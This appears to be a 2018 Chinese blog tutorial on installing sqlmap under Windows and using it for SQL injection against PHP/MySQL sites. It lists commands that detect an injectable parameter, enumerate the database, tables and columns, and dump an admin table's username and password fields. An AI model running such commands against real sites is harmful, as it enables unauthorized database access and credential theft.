当前位置:首页 > 互联网杂谈 > 正文内容

利用sqlmap进行php+mysql注入(windows环境)

老威5年前 (2018-06-25)互联网杂谈34350

老威SEO前段时间研究了一下sqlmap,其作为一款自动化的sql注入渗透工具,注入方式、注入成功后的取数据等等都是自动化的,非常适合我们这些小白前期玩玩渗透玩玩安全,它是用python写的,因此需要先安装python环境,一般都是傻瓜式安装操作

一、sqlmap的安装

1.python下载地址:

https://www.python.org/downloads/

2.sqlmap下载地址:

http://sqlmap.org/

把下载的sqlmap压缩包解压到文件夹sqlmap中,并将其复制粘贴到 “C:\Python27” 目录下(注:Python27为python安装文件夹)

在桌面新建一个cmd的快捷方式,将其命名为“SQLMap”,并键入对象位置为:cmd,快捷方式名称:SQLMap

双击刚才创建的快捷方式,输入sqlmap.py -h,出现如下信息则表示安装成功。 

sqlmap教程

二、sqlmap的常用命令

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193"  检测注入

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-user   获取当前用户  laowei@localhost

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-db 获取当前数据库 如为db_inis

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --tables -D db_inis

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables  获取当前数据库下所有表 如表为3

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user   获取表3下的所有字段 如字段为4,5,6

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user -C pwd,username --dump   注入完成

最后:此文章还待更新中……请持续关注

扫描二维码至手机访问

扫描二维码推送至手机访问。

版权声明:本文由老威SEO发布,如需转载请注明出处。

转载请注明出处:http://www.lwseo.cn/hlw/100.html

分享给朋友:

相关文章

windows环境下"php-cgi.exe - FastCGI 进程意外退出"的解决办法

windows环境下"php-cgi.exe - FastCGI 进程意外退出"的解决办法

市面上很多windows环境下的php集成软件,像是phpstudy、wampserver、AppServ等,傻瓜式操作解决了我们很多繁杂的操作问题,但是也会出现一些特殊情况,大概就是人家php明明是...

zkeys对接支付宝当面付教程及插件

zkeys对接支付宝当面付教程及插件

一、支付宝当面付开通链接:支付宝当面付当面付具体的开通流程支付宝官方都给出了解释,老威在这里就不在做强调了;二、下载zkeys接入当面付插件:zkeys插件直接解压到网站根目录即可三、zkeys后台设...

SEO博客为你讲述何为流量劫持

SEO博客为你讲述何为流量劫持

最近互联网打击越来越严格了,先不说快手抖音,内涵段子连整改的机会都没有了,真是让广大段友操碎了心,头条老大张一鸣的道歉看出来其强烈的求生欲望,甚至“今日头条要凉”等一类话题还在持续发酵时,又爆出一个热...

服务器防护软件有哪些比较好用

服务器防护软件有哪些比较好用

前段时间老威朋友的网站被黑了,并且是同一个服务器下的所有网站,老威大概研究了一下日志,最先是从一个gif文件上传进来,后来做了提权,不仅有了这个网站的权限,还提到了服务器admin用户的权限,导致所有...

CentOS7下如何安装GUI图形界面

CentOS7下如何安装GUI图形界面

临毕业时候买的阿里云的学生机服务器一直没怎么用,然后最近想玩玩linux,把那个系统盘换成了CentOS系统的,安装CentOS7服务器版本的时候,系统默认是不会安装图形界面的,大学的时候用过红帽的,...

windows server2012远程桌面多用户同时登录的方法

windows server2012远程桌面多用户同时登录的方法

目前市面上各大服务商的远程服务器老威几乎都用过,印象里好像只有西部数码是配备了允许三个远程用户同时登陆,其他的应该都是一个,这样其实非常不方便,如果一个公司有两个以上的技术同时对服务器有操作需求的话就...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。